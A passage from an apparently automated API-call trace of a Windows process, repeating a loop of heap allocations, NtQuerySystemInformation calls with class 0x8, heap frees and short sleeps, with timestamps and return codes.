Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.926] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.926] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.927] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.927] Sleep (dwMilliseconds=0x110) [0222.001] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.001] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.002] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.002] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.002] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.003] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.003] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.003] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.004] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.004] Sleep (dwMilliseconds=0x110) [0222.017] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.017] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.018] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.018] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.018] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.019] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.019] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.019] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.020] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.020] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.021] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.022] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.022] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.023] Sleep (dwMilliseconds=0x110) [0222.029] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.029] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.030] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.030] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.030] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.031] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.031] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.032] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.032] Sleep (dwMilliseconds=0x110) [0222.047] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.047] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.048] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.048] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.048] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.049] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.049] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.049] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.050] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.050] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.050] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.051] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.051] Sleep (dwMilliseconds=0x110) [0222.059] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.060] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.060] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.060] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.061] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.061] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.064] Sleep (dwMilliseconds=0x110) [0222.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.083] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.084] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.084] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.085] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.085] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.085] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.086] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.086] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.087] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.087] Sleep (dwMilliseconds=0x110) [0222.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.095] Sleep (dwMilliseconds=0x110) [0222.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.108] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.109] Sleep (dwMilliseconds=0x110) [0222.126] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.126] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.127] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.127] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.127] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.128] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.128] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.128] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.129] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.130] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.130] Sleep (dwMilliseconds=0x110) [0222.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.143] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.144] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.144] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.145] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.145] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.145] Sleep (dwMilliseconds=0x110) [0222.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.157] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.158] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.158] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.159] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.159] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.159] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.160] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.160] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.161] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.161] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.162] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.162] Sleep (dwMilliseconds=0x110) [0222.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.174] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.175] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.175] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.176] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.176] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.176] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.177] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.177] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.177] Sleep (dwMilliseconds=0x110) [0222.188] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.189] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.190] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.190] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.190] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.191] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.191] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0222.191] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.192] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.192] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0222.192] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0222.193] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.193] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0222.194] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.194] Sleep (dwMilliseconds=0x110) [0222.204] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0222.204] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.205] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0222.205] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0222.205] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0222.206] HeapFree (in: hHeap=0x2560000, 